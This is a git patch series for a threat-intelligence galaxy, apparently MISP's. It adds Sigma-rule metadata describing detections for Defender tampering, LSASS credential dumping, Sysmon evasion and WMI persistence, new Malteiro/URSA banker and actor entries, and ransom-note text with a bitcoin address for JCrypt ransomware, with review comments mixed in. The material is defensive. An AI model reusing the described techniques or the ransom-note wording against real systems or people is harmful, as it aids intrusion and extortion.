"logsource.product": "windows" + } + }, + { + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", + "value": "Disable Windows Defender Functionalities Via Registry Keys", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_windows_defender_tamper.yml", + "author": "AlertIQ, J\u00e1n Tren\u010dansk\u00fd, frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "value": "Winlogon AllowMultipleTSSessions Enable", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/09/09", + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", + "author": "Nasreddine 
Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitmate use of the multi session functionality" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "value": "Winlogon Notify Key Logon Persistence", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ], + "creation_date": "2021/12/30", + "filename": "registry_set_winlogon_notify_key.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Add DLLPathOverride Entry For Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/regsitry_set_natural_language_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "regsitry_set_natural_language_persistence.yml", + 
"author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects Accessing to lsass.exe by Powershell", + "uuid": "3f07b9d1-2082-4c56-9277-613a621983cc", + "value": "Accessing WinAPI in PowerShell for Credentials Dumping", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/10/06", + "filename": "sysmon_accessing_winapi_in_powershell_credentials_dumping.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", + "value": "Sysmon Configuration Change", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/12", + "filename": "sysmon_config_modification.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administrative action" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "value": "Sysmon Configuration Error", + "meta": { + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "creation_date": "2021/06/04", + "filename": "sysmon_config_modification_error.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate administrative action" + ], + "logsource.category": "sysmon_error", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", + "value": "Sysmon Configuration Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564" + ], + "creation_date": "2021/06/04", + "filename": "sysmon_config_modification_status.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate administrative action" + ], + "logsource.category": "sysmon_status", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.", + "uuid": "e554f142-5cf3-4e55-ace9-a1b59e0def65", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon", + "meta": { + "refs": [ + 
"https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], + "creation_date": "2020/10/12", + "filename": "sysmon_dcom_iertutil_dll_hijack.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "value": "Sysmon Blocked Executable", + "meta": { + "refs": [ + "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_exe.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/16", + "filename": "sysmon_file_block_exe.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_block", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "uuid": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "value": "Sysmon Process Hollowing Detection", + "meta": { + "refs": [ + "https://twitter.com/SecurePeacock/status/1486054048390332423?s=20", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_process_hollowing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" + ], + 
"creation_date": "2022/01/25", + "filename": "sysmon_process_hollowing.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "level": "high", + "falsepositive": [ + "There are no known false positives at this time" + ], + "logsource.category": "process_tampering", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of WMI event subscription persistence method", + "uuid": "0f06a3a5-6a09-413f-8743-e6cf35561297", + "value": "WMI Event Subscription", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2019/01/12", + "filename": "sysmon_wmi_event_subscription.yml", + "author": "Tom Ueltschi (@c_APT_ure)", + "level": "medium", + "falsepositive": [ + "Exclude legitimate (vetted) use of WMI event subscription in your network" + ], + "logsource.category": "wmi_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious encoded payloads in WMI Event Consumers", + "uuid": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", + "value": "Suspicious Encoded Scripts in a WMI Consumer", + "meta": { + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2021/09/01", + "filename": "sysmon_wmi_susp_encoded_scripts.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "wmi_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "uuid": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "value": "Suspicious Scripting in a WMI 
Consumer", + "meta": { + "refs": [ + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", + "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "creation_date": "2019/04/15", + "filename": "sysmon_wmi_susp_scripting.yml", + "author": "Florian Roth, Jonhnathan Ribeiro", + "level": "high", + "falsepositive": [ + "Legitimate administrative scripts" + ], + "logsource.category": "wmi_event", + "logsource.product": "windows" + } + } + ], + "version": 1 +} \ No newline at end of file diff --git a/galaxies/sigma-rules.json b/galaxies/sigma-rules.json new file mode 100644 index 0000000..2733e81 --- /dev/null +++ b/galaxies/sigma-rules.json @@ -0,0 +1,9 @@ +{ + "description": "Sigma Rules are used to detect suspicious behaviors related to threat actors, malware and tools", + "icon": "link", + "name": "Sigma-Rules", + "namespace": "misp", + "type": "sigma-rules", + "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", + "version": 1 +} \ No newline at end of file From 3f4edb480baf9fb54952fe4a61df391ac819e732 Mon Sep 17 00:00:00 2001 From: Delta-Sierra Date: Fri, 16 Dec 2022 16:43:50 +0100 Subject: [PATCH 03/13] add Malteiro --- clusters/banker.json | 24 +++++++++++++++++++++++- clusters/threat-actor.json | 20 ++++++++++++++++++++ 2 files changed, 43 insertions(+), 1 deletion(-) diff --git a/clusters/banker.json b/clusters/banker.json index 38a2f19..c099f15 100644 --- a/clusters/banker.json +++ b/clusters/banker.json 
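Review bot: Both new files end without a trailing newline — the `\ No newline at end of file` marker follows the closing `}` of `galaxies/sigma-rules.json` and of `clusters/sigma-rules.json` — so the next edit to either file will show a spurious change on the closing brace. Add a final newline after the closing `}` in both files; for the generated cluster this is best fixed in the generator so it does not regress on the next regeneration. The galaxy `"description"` could also say what one cluster entry corresponds to (presumably one entry per Sigma rule, judging by the `filename` meta field on each entry), e.g. `"description": "Sigma rules, one cluster entry per rule, used to detect suspicious behaviors related to threat actors, malware and tools"`.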
@@ -1195,7 +1195,29 @@
 },
 "uuid": "fa574138-a3bd-4ebc-a5f7-3b465df7106f",
 "value": "Dark Tequila"
+ },
+ {
+ "description": "Distributed by Malteiro",
+ "meta": {
+ "refs": [
+ "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/"
+ ],
+ "synonyms": [
+ "URSA"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ba57c28a-47d0-46ba-a933-9aed69f7b84f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "delivered-by"
+ }
+ ],
+ "uuid": "d27eea57-e55f-40b1-9690-55c2c8500876",
+ "value": "Malteiro"
 }
 ],
- "version": 17
+ "version": 18
 }
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 3aa75c7..2c01817 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -9964,6 +9964,26 @@
 ],
 "uuid": "e5865ca1-ec95-43e2-954a-d0f3507a9747",
 "value": "TAG-53"
+ },
+ {
+ "description": "This group of cybercriminals is named Malteiroby SCILabs, they operate and distribute the URSA/Mispadu banking trojan.",
+ "meta": {
+ "refs": [
+ "https://blog.scilabs.mx/en/cyber-threat-profile-malteiro/",
+ "https://blog.scilabs.mx/cyber-threat-profile-malteiro/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "d27eea57-e55f-40b1-9690-55c2c8500876",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "delivers"
+ }
+ ],
+ "uuid": "ba57c28a-47d0-46ba-a933-9aed69f7b84f",
+ "value": "Malteiro"
 }
 ],
 "version": 256
From d4debd619b1c1a38ca71119fdbf3f858c186f972 Mon Sep 17 00:00:00 2001
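Review bot: `"value": "Malteiro"` names the new banker entry after the threat actor rather than the malware; the threat-actor hunk in the same commit describes Malteiro as the group that operates the URSA/Mispadu banking trojan, so the malware entry should carry the malware name, e.g. `"value": "URSA"` with `"Mispadu"` added to `synonyms`, and `"description": "Distributed by Malteiro"` should say what the entry is, e.g. `"description": "URSA/Mispadu banking trojan operated and distributed by the Malteiro group."`. If the cluster already contains a Mispadu entry (not visible in this hunk), the `delivered-by` relation belongs on that entry rather than on a duplicate. The `dest-uuid` does match the `uuid` of the new threat-actor entry, so the cross-reference itself is consistent.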
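Review bot: The threat-actor description has a typo and a comma splice, `Malteiroby SCILabs, they operate` — it should read `"description": "This group of cybercriminals is named Malteiro by SCILabs; they operate and distribute the URSA/Mispadu banking trojan."`. The `related` block's `dest-uuid` matches the `uuid` of the banker entry added in the same commit, so the `delivers`/`delivered-by` pair is consistent.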
From: =?UTF-8?q?J=C3=BCrgen=20L=C3=B6hel?=
Date: Fri, 23 Dec 2022 01:44:20 -0600
Subject: [PATCH 04/13] chg: [ransomware] Extends the entry for JCrypt
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* Add the reference to MafiaWare666 based on the latest research from the Avast Threat Lab: https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/
* Add more infos from Andrew Ivanovs the great blog post: https://id-ransomware.blogspot.com/2020/12/jcrypt-ransomware.html
Signed-off-by: Jürgen Löhel
---
clusters/ransomware.json | 74 ++++++++++++++++++++++++++++++++++++++--
1 file changed, 71 insertions(+), 3 deletions(-)
diff --git a/clusters/ransomware.json b/clusters/ransomware.json
index d1f599c..04b1197 100644
--- a/clusters/ransomware.json
+++ b/clusters/ransomware.json
@@ -24257,9 +24257,77 @@
 "value": "Povisomware"
 },
 {
- "description": "ransomware",
+ "description": "Ransomware written in C#. Fortunately, all current versions of the MafiaWare666 ransomware are decryptable. The Threat Lab from Avast has developed a free decryption tool for this malware.",
 "meta": {
- "date": "December 2020"
+ "date": "December 2020",
+ "extensions": [
+ ".jcrypt",
+ ".locked",
+ ".daddycrypt",
+ ".omero",
+ ".ncovid",
+ ".NotStonks",
+ ".crypted",
+ ".iam_watching",
+ ".vn_os",
+ ".wearefriends",
+ ".MALWAREDEVELOPER",
+ ".MALKI",
+ ".poison",
+ ".foxxy",
+ ".ZAHACKED",
+ ".JEBAĆ_BYDGOSZCZ!!!",
+ ".titancrypt",
+ ".crypt",
+ ".MafiaWare666",
+ ".brutusptCrypt",
+ ".bmcrypt",
+ ".cyberone",
+ ".l33ch"
+ ],
+ "payment-method": "Bitcoin",
+ "ransomenotes": [
+ "All of your files have been encrypted.\nTo unlock them, please send 1 bitcoin(s) to BTC address: 1BtUL5dhVXHwKLqSdhjyjK9Pe64Vc6CEH1 Afterwards,\nI please email your transaction ID to: this.email.address@gmail.com\nThank you and have a nice day! Encryption Log: ..."
+ ],
+ "ransomenotes-refs": [
+ "https://1.bp.blogspot.com/-OF8CopM3MUw/X-XLjUmRkYI/AAAAAAAAXpY/1mLe136SuT8DuruWJfwIVY5WnVs5B1gcgCLcBGAsYHQ/s943/txt-note.png"
+ ],
+ "ransomnotes-filenames": [
+ "___RECOVER__FILES__.jcrypt.txt",
+ "_RECOVER__FILES__.jcrypt.txt",
+ "___RECOVER__FILES__.locked.txt",
+ "___RECOVER__FILES__.daddycrypt.txt",
+ "___RECOVER__FILES__.omero.txt",
+ "___RECOVER__FILES__.ncovid.txt",
+ "___RECOVER__FILES__.crypted.txt",
+ "___RECOVER__FILES__.iam_watching.txt",
+ "___RECOVER__FILES__.titancrypt.txt",
+ "_#ODZYSKAJ_PLIKI--.JEBAĆ_BYDGOSZCZ!!!.txt"
+ ],
+ "refs": [
+ "https://id-ransomware.blogspot.com/2020/12/jcrypt-ransomware.html",
+ "https://twitter.com/kangxiaopao/status/1342027328063295488?lang=en",
+ "https://twitter.com/demonslay335/status/1380610583603638277",
+ "https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/",
+ "https://files.avast.com/files/decryptor/avast_decryptor_mafiaware666.exe"
+ ],
+ "synonyms": [
+ "RIP lmao",
+ "Locked",
+ "Daddycrypt",
+ "Omero",
+ "Crypted",
+ "Ncovid",
+ "NotStonks",
+ "Iam_watching",
+ "Vn_os",
+ "Wearefriends",
+ "MALWAREDEVELOPER",
+ "MALKI",
+ "Poison",
+ "Foxxy",
+ "Mafiaware666"
+ ]
 },
 "uuid": "dd5712e1-efa8-4054-a5df-fdfdbc9c25b6",
 "value": "JCrypt"
@@ -24861,5 +24929,5 @@
 "value": "Karakurt"
 }
 ],
- "version": 111
+ "version": 112
 }
From 9955401791a8f4cf96751eba95f5932ae0213724 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Fri, 6 Jan 2023 15:13:35 +0100
Subject: [PATCH 05/13] chg: [sigma] jq all the things
---
clusters/sigma-rules.json | 126522 +++++++++++++++++------------------
galaxies/sigma-rules.json | 2 +-
2 files changed, 63262 insertions(+), 63262 deletions(-)
diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json
index a94cb72..39ca38c 100644
--- a/clusters/sigma-rules.json
+++ b/clusters/sigma-rules.json
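Review bot: The keys `"ransomenotes"` and `"ransomenotes-refs"` are misspelled; the same hunk uses `"ransomnotes-filenames"` a few lines below and the rest of the cluster spells these fields `ransomnotes` / `ransomnotes-refs`, so the note text and its screenshot reference will sit under keys that nothing reading the standard fields will find. Rename them to `"ransomnotes": [` and `"ransomnotes-refs": [`. Separately, the last `refs` entry points straight at `avast_decryptor_mafiaware666.exe`, an executable download rather than a reference page; the decoded.avast.io write-up listed just above it presumably links to the tool, so the binary URL could be dropped or at least moved out of `refs`.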
@@ -1,63262 +1,63262 @@ { - "authors": [ - "@Joseliyo_Jstnk" - ], - "category": "rules", - "description": "MISP galaxy cluster based on Sigma Rules.", - "name": "Sigma-Rules", - "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", - "type": "sigma-rules", - "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", - "values": [ - { - "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", - "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", - "value": "Antivirus Exploitation Framework Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2018/09/09", - "filename": "av_exploiting.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", - "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", - "value": "Antivirus Hacktool Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2021/08/16", - "filename": "av_hacktool.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a password dumper", - "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", - 
"value": "Antivirus Password Dumper Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", - "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1558", - "attack.t1003.001", - "attack.t1003.002" - ], - "creation_date": "2018/09/09", - "filename": "av_password_dumper.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", - "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", - "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection", - "meta": { - "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2021/07/01", - "filename": "av_printernightmare_cve_2021_34527.yml", - "author": "Sittikorn S, Nuttakorn T, Tim Shelton", - "level": "critical", - "falsepositive": [ - "Unlikely, or pending PSP analysis" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports ransomware", - "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", - "value": "Antivirus 
Ransomware Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/?s=antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" - ], - "tags": [ - "attack.t1486" - ], - "creation_date": "2022/05/12", - "filename": "av_ransomware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", - "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", - "value": "Antivirus Relevant File Paths Alerts", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588" - ], - "creation_date": "2018/09/09", - "filename": "av_relevant_files.yml", - "author": "Florian Roth, Arnim Rupp", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. 
github and checking the matches.", - "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", - "value": "Antivirus Web Shell Detection", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", - "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2018/09/09", - "filename": "av_webshell.yml", - "author": "Florian Roth, Arnim Rupp", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "antivirus", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", - "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", - "value": "Django Framework Exceptions", - "meta": { - "refs": [ - "https://docs.djangoproject.com/en/1.11/ref/exceptions/", - "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/08/05", - "filename": "appframework_django_exceptions.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "django" - } - }, - { - "description": "Generic rule for SQL exceptions in Python according to PEP 249", - "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", - "value": "Python SQL Exceptions", - "meta": { - "refs": [ - "https://www.python.org/dev/peps/pep-0249/#exceptions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/08/12", - "filename": "app_python_sql_exceptions.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Application bugs" - ], - "logsource.category": "application", - "logsource.product": "python" - } - }, - { - "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", - "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", - "value": "Remote Schedule Task Lateral Movement via ATSvc", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1053/", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1053", - 
